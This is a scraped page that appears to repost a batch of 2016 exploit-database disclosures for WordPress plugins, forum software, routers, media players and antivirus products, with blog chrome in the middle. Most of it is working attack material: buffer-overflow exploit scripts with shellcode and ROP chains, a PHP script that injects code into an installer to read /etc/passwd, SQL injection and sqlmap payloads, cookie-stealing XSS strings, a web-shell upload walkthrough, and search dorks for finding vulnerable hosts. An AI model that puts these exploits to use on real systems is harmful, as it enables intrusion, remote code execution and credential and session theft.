# Exploit Title: Wordpress Ultimate-Product-Catalog v3.8.6 Arbitrary file (RCE)
# Date: 2016-06-23
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Version: 3.8.6
# Tested on: windows 7 + Mozilla firefox.
# Demo: https://youtu.be/FSRZlD3SVQc
====================
DESCRIPTION
====================
An arbitrary file upload web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin v3.8.6 and below.
The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory if the plugin is premium version and the remote
attacker have an especific account (contributor|editor|author|administrator) who can manage this plugin.
===================
STEPS TO REPRODUCE
===================
1.- Go to "Custom fields" tab and add a new custom field with "type" file.
2.- Go to "Products" tab, Now you can see a new field with that you added previously.
3.- Select your php shell and save the product.
4.- Go to uri "http(s)://<wp-host>/<wp-path>/wp-content/uploads/upcp-product-file-uploads/<your-shell-name>" and enjoy.
================
Vulnerable code
================
located in <upc-plugin-path>/Functions/Update_Admin-Databases.php` file, the function `UPCP_Handle_File_Upload` does not check for file extensions.
function UPCP_Handle_File_Upload($Field_Name) {
..
if (!is_user_logged_in()) {exit();}
/* Make sure that the file exists */
elseif (empty($_FILES[$Field_Name]['tmp_name']) || $_FILES[$Field_Name]['tmp_name'] == 'none') {
$error = __('No file was uploaded here..', 'UPCP');
}
/* Move the file and store the URL to pass it onwards*/
else {
$msg .= $_FILES[$Field_Name]['name'];
//for security reason, we force to remove all uploaded file
$target_path = ABSPATH . 'wp-content/uploads/upcp-product-file-uploads/';
//create the uploads directory if it doesn't exist
if (!file_exists($target_path)) {
mkdir($target_path, 0777, true);
}
$target_path = $target_path . basename( $_FILES[$Field_Name]['name']);
if (!move_uploaded_file($_FILES[$Field_Name]['tmp_name'], $target_path)) {
//if (!$upload = wp_upload_bits($_FILES["Item_Image"]["name"], null, file_get_contents($_FILES["Item_Image"]["tmp_name"]))) {
$error .= "There was an error uploading the file, please try again!";
}
...
}
?>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
==========
time-line
==========
2015-08-08: vulnerability found
2016-06-21: Reported to vendor (No response)
2016-06-24: Public disclousure
===================================
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863289320
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Product -> OPAC KpwinSQL - SQL Injection
Date -> 6/24/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.kpsys.cz/
Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
Product Version -> / All
SQL Version -> Firebird 1.5.3
OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista
Dork -> intitle:"WWW OPAC KpwinSQL"
Dork2 -> inurl:zaznam.php?detail_num=
Dork3 -> inurl:opacsql2_0
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
File: zanzam.php
Parameter: detail_num
Test > http://localhost:8888/zaznam.php?detail_num=1'
Response:
24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:\wwwopac\functions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se ...
# Exploit Title: Magnet Networks – Weak WPA-PSK passphrases used in Tesley CPVA 642 Router
# Google Dork:
# Date: 01/06/2016
# Author: Matt O'Connor
# Advisory Link: https://www.rgb.ie/magnet-broadband-weak-wpa-psk-algorithm.pdf
# Version:
# Category: Remote
# Tested on: Magnet Networks Tesley CPVA 642
The Tesley CPVA 642 routers supplied by Magnet Networks are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
The WPA-PSK pass phrase has the following features:
• Starts with MAGNET0
• Adds six random numerical digits
• 1 million possible combinations ( MAGNET0000000 – MAGNET0999999 )
The entire keyspace can be generated using “mask processor” by ATOM, piping each letter out to its own file, for example:
./mp32 MAGNET0?1?1?1?1?1?1 > magnet_networks_tesley_ks.txt
The .txt file weighs in at around 45mb.
Using a 1.4ghz i3 processor on a budget laptop, we were hitting 1,000 keys per second. Breakdown below:
• 1,000,000 / 1,000 keys per second = 1,000 seconds
• 1,000 / 60 seconds = 16~ minutes
The WPA-PSK handshake we used has the password MAGNET0349325 and was cracked within ~6 minutes.
If you’re using the default password on your Magnet Networks Tesley CPVA 642 Router, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols.
On the 20th of June 2016, Magnet Networks Customer Care confirmed via email that these routers are not used by Magnet Networks anymore.
# Exploit Title: Codoforum v3.4 Stored Cross-Site Scripting (Stored XSS)
# Google Dork: intext:"powered by codoforum"
# Date: 01/06/2016
# Exploit Author: Ahmed Sherif (OffensiveBits)
# Vendor Homepage: http://codologic.com/page/
# Software Link: http://codoforum.com/index.php
# Version: V3.4
# Tested on: Linux Mint
1. Description:
The Reply and search functionalities are both vulnerable to Stored XSS due
to improper filtration in displaying the content of replies.
2. Steps to reproduce the vulnerability:
1. Login to your account.
2. look for any topic and add a reply .
3. in the reply textbox add a widely used common keyword within xss
payload for example : (keyword"><svg/onload=prompt(document.cookie)>)
4. while any user surfing the topic and started to search for specific
keywords the javascript code will be executed.
3. Solution:
The new version of codoforum will be released this week.
Option CloudGate Insecure Direct Object References Authorization Bypass
Vendor: Option NV
Product web page: http://www.option.com
Affected version: CG0192-11897
Summary: The CloudGate M2M gateway from Option provides competitively
priced LAN to WWAN routing and GPS functionality in a single basic unit
certified on all major us cellular operators (CDMA/EV-DO and WCDMA/HSPA+).
The CloudGate is simple to configure locally or remotely from your PC,
tablet or Smartphone.
Desc: Insecure Direct Object References occur when an application provides
direct access to objects based on user-supplied input. As a result of this
vulnerability attackers can bypass authorization and access resources and
functionalities in the system directly, for example APIs, files, upload
utilities, device settings, etc.
Tested on: lighttpd 1.4.39
firmware 2.62.4
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5333
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5333.php
11.06.2016
--
GET /partials/firewall.html
GET /partials/system.html
GET /partials/ipsec.html
GET /partials/provisioning.html
GET /api/login
GET /api/replacementui
GET /api/goatgates
OR
/#/firewall
/#/system
/#/ipsec
/#/provisioning
XSS:
http://127.0.0.2/api/replacementui<script>alert(1)</script>
http://127.0.0.2/api/goatgates<script>alert(2)</script>
http://127.0.0.2/api/Blah-Blah<script>alert(3)</script>
http://127.0.0.2/api/<script>alert(4)</script>
#!/usr/bin/python
# Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)
# Date: 25-June-2016
# Exploit Author: Sibusiso Sishi
# Email: sibusiso [at] IronSky [dot] co.za
# Vendor Homepage: http://www.mediacoderhq.com/
# Software Link: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=MediaCoder-0.8.43.5830.exe
# Version: 0.8.43.5830
# Tested on: Windows XP SP3 EN
#msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f c
shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e"
"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb"
"\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a"
"\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b"
"\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b"
"\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32"
"\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0"
"\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d"
"\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad"
"\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85"
"\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d"
"\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1"
"\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd"
"\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3")
seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll
nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode
nop_sled = "\x90" * 14
buff = "http:// "
buff += "A" * 776
buff += nseh
buff += seh
buff += nop_sled
buff += shellcode
buff += "D" * (4216 - (len(shellcode + nop_sled)))
fo = open("foo.m3u", "wb")
fo.write (buff)
fo.close()
/*
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt
[+] ISR: APPARITIONSEC
Vendor:
=================
mylittleforum.net
Download:
github.com/ilosuna/mylittleforum/releases/tag/v2.3.5
Product:
===================
MyLittleForum 2.3.5
my little forum is a simple PHP and MySQL based internet forum that
displays the messages in classical threaded
view (tree structure). The main claim of this web forum is simplicity.
Furthermore it should be easy to install
and run on a standard server configuration with PHP and MySQL.
Vulnerability Type:
=======================
PHP Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
When setting up mylittleforum CMS users will have to walk thru an
installation script and provide details for the application like the
forums email address, name, admin email, admin password, database name
etc...
However, no input validation / checks exists for that installation script.
Low privileged users can then supply arbitrary PHP code for
the Database Name. The PHP command values will get written to the
config/db_settings.php file and processed by the application. Since
we supply an invalid Database Name a MySQL error will be thrown but the
injected PHP payload will also be executed on the host system.
If the CMS is installed by low privileged user and that user has basic
MySQL database authorization to run the install for the CMS it
can result in a privilege escalation, remote command execution and complete
takeover of the host server.
The /config/db_settings.php is protected by .htaccess file but we can write
directly to "db_settings.php" file and execute code directly
from /install/index.php file bypassing any access control provided by the
.htaccess file or we just delete it by adding call to PHP function
@unlink('.htaccess') to our injected PHP payload.
1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php
2) For Database Name input field enter the below PHP code for POC.
';?><?php echo passthru('/bin/cat /etc/passwd');'
This results in config/db_settings.php file being injected with our
arbitrary PHP code.
$db_settings['database'] = '';?><?php echo passthru('/bin/cat
/etc/passwd');'';
3) Make another HTTP GET request to same page "/install/index.php" file and
done!... we access /etc/passwd system file.
HTTP/1.1 200 OK
Date: Fri, 24 Jun 2016 03:01:13 GMT
Server: Apache/2.4.12 (Unix) OpenSSL/1.0.1m PHP/5.6.8 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.8
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
etc...
Exploit code(s):
===============
1) Download and unpack mylittleforum-2.3.5 upload to web server (Linux), chmod -R 777 etc...
2) Run below PHP script from Command line from remote work station
3) BOOM we can now read Linux "/etc/passwd" file on remote server
*/
<?php
#mylittleforum-2.3.5 PHP CMD Execution Exploit
#by hyp3rlinx
#ISR: apparitionsec
#hyp3rlinx.altervista.org
#cat Linux system file '/etc/passwd' POC
#tested RH Linux 5
#=======================================================
if($argc<5){
echo "myLittleForum CMS PHP Command Execution Exploit\r\n";
echo "Usage: <IP>,<MySQL-USER>,<MySQL-PASSWD>,<ROOT DIR>\r\n";
echo "================= by hyp3rlinx ===================\r\n";
exit();
}
$port=80; #Default port
$victim=$argv[1]; #IP
$user=$argv[2]; #MySQL username
$pwd=$argv[3]; #MySQL password
$root_dir=$argv[4]; #/mylittleforum-2.3.5
$uri="/install/index.php"; #PHP CMD inject entry point
$s = fsockopen($victim, $port, $errno, $errstr, 10);
if(!$s){echo "Cant connect to the server!"; exit();}
$CMD_INJECTTION="forum_name=PWN".
"&forum_address=http://$victim/$root_dir/".
"&forum_email=x@x.com".
"&admin_name=$user".
"&admin_email=x@x.com".
"&admin_pw=$pwd".
"&admin_pw_conf=$pwd".
"&host=localhost".
"&database=';?><?php echo passthru('/bin/cat /etc/passwd');'".
"&user=$user".
"&password=$pwd".
"&table_prefix=mlf2_".
"&install_submit=OK+-+Install+forum".
"&language_file=english.lang";
#Inject commands
$out = "POST /$root_dir/$uri HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($CMD_INJECTTION) . "\r\n";
$out .= "Connection: close\r\n\r\n";
fwrite($s, $out);
fwrite($s, $CMD_INJECTTION);
fclose($s);
sleep(2);
#Second HTTP request to read Linux /etc/passwd file in the response
$out="";
$s = fsockopen($victim, $port, $errno, $errstr, 10);
$out = "GET /$root_dir/$uri HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($s, $out);
$r='';
while (!feof($s)) {
$r=fgets($s, 128);
echo $r;
if(strpos($r,'<!DOCTYPE')!==FALSE){
break;
}
}
fclose($s);
?>
/*
Disclosure Timeline:
=================================
Vendor Notification: No Reply
June 27, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
===========================================
(High) 8.7
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
*/
# Exploit Title: Panda Security Privilege Escalation
# Date: 27/6/2016
# Exploit Author: Security-Assessment.com
# Vendor Homepage: http://www.pandasecurity.com
# Version: Panda Global Protection 2016 (16.1.2),Panda Antivirus Pro 2016 (16.1.2),Panda Small Business Protection (16.1.2),Panda Internet Security 2016 (16.1.2)
# Tested on: Windows 10
Panda Security – Privilege Escalation
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Panda Security - Privilege Escalation
Affected Software -
Panda Global Protection 2016 (16.1.2)
Panda Antivirus Pro 2016 (16.1.2)
Panda Small Business Protection (16.1.2)
Panda Internet Security 2016 (16.1.2)
Testing Environment - Windows 10
PDF: http://www.security-assessment.com/files/documents/advisory/Panda%20Security%20-%20Privilege%20Escalation.pdf
+-------------+
| Description |
+-------------+
Multiple Panda Security products are vulnerable to local privilege escalation. As the USERS group has write permissions over the folder where the PSEvents.exe process is located, it is possible to execute malicious code as Local System.
+--------------+
| Exploitation |
+--------------+
“PSEvents.exe” is scheduled to be executed every hour with SYSTEM Privileges. When executed, it tries to locate a number of DLLs in its local directory to be loaded. However, some of these DLLs don’t exist.
The DACLs of the directory that contains the “PSEvents.exe” executable allow a user in the USERS group to create files in that directory. A malicious user can exploit this vulnerability by creating a malicious DLL file in that directory and name it as one of the missing DLLs. After one hour, the “PSEvents.exe” process will start and load our malicious DLL
The same method can be used to exploit other executables (PSDevice.exe and PSProfiler.exe) located in Panda’s Downloads directory.
+----------+
| Solution |
+----------+
Install Panda’s Hotfix for this vulnerability.
http://www.pandasecurity.com/uk/support/card?id=100053
+----------+
| Timeline |
+----------+
10/5/2016 - Exchange PGP
11/5/2016 - Advisory sent to Panda Security
14/5/2016 - Confirm receipt of the advisory
23/5/2016 - Email Panda Security for update
01/6/2016 - Panda Security reply that they have a fix in development.
16/6/2016 - Panda Security send hotfix to verify if it fixes the vulnerability.
21/6/2016 - Panda Security schedule to release the hotfix on 24/6/2016
24/6/2016 - Hotfix released
27/6/2016 - Advisory released
+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+
Security-Assessment.com is a leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings, contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
#!/usr/bin/env python
#
# Exploit Title: VUPlayer <=2.49 .M3u Buffer overflow exploit with DEP bypass
# Date: 26-06-2016
# Exploit Author: secfigo
# Vendor Homepage: http://vuplayer.com/
# Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe
# Version: VUPlayer <=2.49
# Tested on: Windows 7 SP1 DEP=alwayson
# Greetz: Raghu, nullSingapore
###################################################################################
import struct
###################################################################################
# Shellcode
# windows/exec CMD=calc.exe with size 227 and bad characters "\x00\x09\x0a\x0d\x1a"
###################################################################################
shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
"\x1c\x80")
junk = "HTTP://" + "A"*1005
###################################################################################
# rop gadgets with some modifications
# bad characters = "\x00\x09\x0a\x0d\x1a"
###################################################################################
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x10010157, # POP EBP # RETN [BASS.dll]
0x10010157, # skip 4 bytes [BASS.dll]
0x10015f77, # POP EAX # RETN [BASS.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x10014db4, # NEG EAX # RETN [BASS.dll]
0x10032f72, # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
0x10015f82, # POP EAX # RETN [BASS.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x10014db4, # NEG EAX # RETN [BASS.dll]
0x10038a6d, # XCHG EAX,EDX # RETN [BASS.dll]
0x101049ec, # POP ECX # RETN [BASSWMA.dll]
0x101082db, # &Writable location [BASSWMA.dll]
0x1001621c, # POP EDI # RETN [BASS.dll]
0x1001dc05, # RETN (ROP NOP) [BASS.dll]
0x10604154, # POP ESI # RETN [BASSMIDI.dll]
0x10101c02, # JMP [EAX] [BASSWMA.dll]
0x10015fe7, # POP EAX # RETN [BASS.dll]
0x1060e25c, # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
0x1001d7a5, # PUSHAD # RETN [BASS.dll]
0x10022aa7, # ptr to 'jmp esp' [BASS.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
nops ="\x90"* 16
buffer = junk + eip + rop_chain + nops+ shellcode+ "C"*(3000-len(junk)-len(eip)-len(rop_chain)-len(nops)-len(shellcode))
print "[+] Creating .m3u file of size "+ str(len(buffer))
file = open('vuplayer-dep.m3u','w');
file.write(buffer);
file.close();
print "[+] Done creating the file"
######################
# Application Name : Kagao v3.0 - Professional Classified Market
# Google Dork : inurl:/cat1.php?id2=
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Vendor Homepage : http://kogaoscript.com/
# Vulnerable Type : SQL Injection & Cross Site Scripting
# Date : 2016-06-26
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/cat1.php
######################
# Vulnerable code :
function pagenat(){
$buildLink = array(
"id" => intval($_GET['id']),
"id2" => isset($_GET['id2']) ? intval($_GET['id2']) : '',
"suche" => htmlspecialchars($_GET['suche']),
"sucheWo" => htmlspecialchars($_GET['sucheWo']),
"umkreis" => intval($_GET['umkreis']),
"page" => ""
);
$buildLink = http_build_query($buildLink);
$buildLink = 'cat1.php?' . $buildLink;
if($_GET['id2']){
$pages_num = getZahlPage($_GET['id2'], 'unterkategorie');
}
else{
$pages_num = getZahlPage($_GET['id'], 'kategorie');
}
$page = (isset($_GET['page'])) ? max($_GET['page'], 1) : 1;
$pages = ($pages_num > 1) ? pages($pages_num, $page, $buildLink) : '';
echo $pages;
}
######################
# PoC Exploit:
http://localhost/[path]/cat1.php?id2=999999.9%22%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29--%20a
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/cat1.php?id2=10 --dbms=mysql --random-agent --technique=BUESTQ --dbs --tamper=versionedkeywords --level=3 --risk=3 --no-cast
Parameter: id2 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id2=10" AND 9863=9863 AND "UvFy"="UvFy
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id2=10" AND SLEEP(5) AND "Zxun"="Zxun
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id2=-5676" UNION ALL SELECT CONCAT(0x716b786271,0x4e77456d62457a716850544f776d506c7679624969616c6b47417542766c4152464c6a665a7a7064,0x7162767671)-- vvJN
---
###################### Cross Site Scripting Vulnerability ######################
# PoC Exploit:
Search: "><script>alert('n4tural');</script>
http://localhost/[path]/cat1.php?id2=0&pricestart=0&room=&flache=&price=&zulassung=&kilometer=&kraftstoff=&id3=0&suche=%22%3E%3Cscript%3Ealert%28%27n4tural%27%29%3B%3C%2Fscript%3E&id=0&sucheWo=&umkreis=0
######################
iBilling v3.7.0 Multiple Stored and Reflected Cross Site Scripting Vulnerabilities
Vendor: iBilling
Product web page: http://www.ibilling.io/
Affected version: 3.7.0
Summary: The features you want, the simplicity you need! Beautifully
designed for best User Interface & User Experience. The software
That Works For YOUR Business! Get growing – with affordable, scalable
business software. Find innovative ways to manage customers data,
communicate with customer, know your business cashflow, net worth,
send invoice to customer Hassle-free with single click payment reminder,
payment confirmations & get paid online integrated with payment gateways.
Desc: iBilling suffers from multiple cross-site scripting vulnerabilities.
The issue is triggered when input passed via multiple parameters is not
properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
Tested on: nginx
PHP/5.5.9-1ubuntu4.6
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
@zeroscience
Advisory ID: ZSL-2016-5332
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5332.php
08.06.2016
1. Cross Site Scripting (Stored):
http://localhost/ibilling/index.php
Parameters: msg, desc, account, phone, company, address, city, state, zip, tags, description, ref (POST)
Payload(s):
account=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&company=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&email=test%40yahoo.com&phone=%22%3E%3Cscript%3Ealert(4)%3C%2Fscript%3E&address=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&city=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&state=%22%3E%3Cscript%3Ealert(7)%3C%2Fscript%3E&zip=%22%3E%3Cscript%3Ealert(8)%3C%2Fscript%3E&country=TR&tags%5B%5D=web_development%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Reflected):
http://localhost/ibilling/index.php
Parameters: cid (POST)
Payload(s):
cid=1001"><script>alert(1)</script>&msg=&icon=
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: PInfo - File viewer
# Version: 0.6.9-5.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: An alternative info-file viewer
# pinfo is an viewer for Info documents, which is based on ncurses.
# Kali Linux 2.0 package: pool/main/p/pinfo/pinfo_0.6.9-5.1_i386.deb
# MD5sum: 9487efb0be037536eeda31b588cb6f89
# Website:http://pinfo.alioth.debian.org/
#
# $ run -m `python -c 'print "A"*564+"DCBA"'`
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000002 EBX: 0xB7F0B000 ECX: 0x00004554 EDX: 0x00000100
# o d I t s z a P c
# ESI: 0x41424344 EDI: 0x00004554 EBP: 0xBFFFF4A4 ESP: 0xBFFFEF30
# EIP: 0xB7D92832
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
# --------------------------------------------------------------------------[code]
# => 0xb7d92832 <__GI_getenv+114>: cmp di,WORD PTR [esi]
# 0xb7d92835 <__GI_getenv+117>: jne 0xb7d92828 <__GI_getenv+104>
# 0xb7d92837 <__GI_getenv+119>: mov eax,DWORD PTR [esp+0x14]
# 0xb7d9283b <__GI_getenv+123>: mov DWORD PTR [esp+0x8],eax
# 0xb7d9283f <__GI_getenv+127>: mov eax,DWORD PTR [esp+0x18]
# 0xb7d92843 <__GI_getenv+131>: mov DWORD PTR [esp+0x4],eax
# 0xb7d92847 <__GI_getenv+135>: lea eax,[esi+0x2]
# 0xb7d9284a <__GI_getenv+138>: mov DWORD PTR [esp],eax
# --------------------------------------------------------------------------------
#
# gdb$ x/100x $esp
# 0xbffff250: 0xbffff49c 0x00000003 0x00000001 0x00000002
# 0xbffff260: 0xb7d6ebf8 0xb7fe78bd 0xb7d74ffd 0x41049384
# 0xbffff270: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff280: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff290: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff2a0: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff2b0: 0x41414141 0x41414141 0x41414141 0x41414141
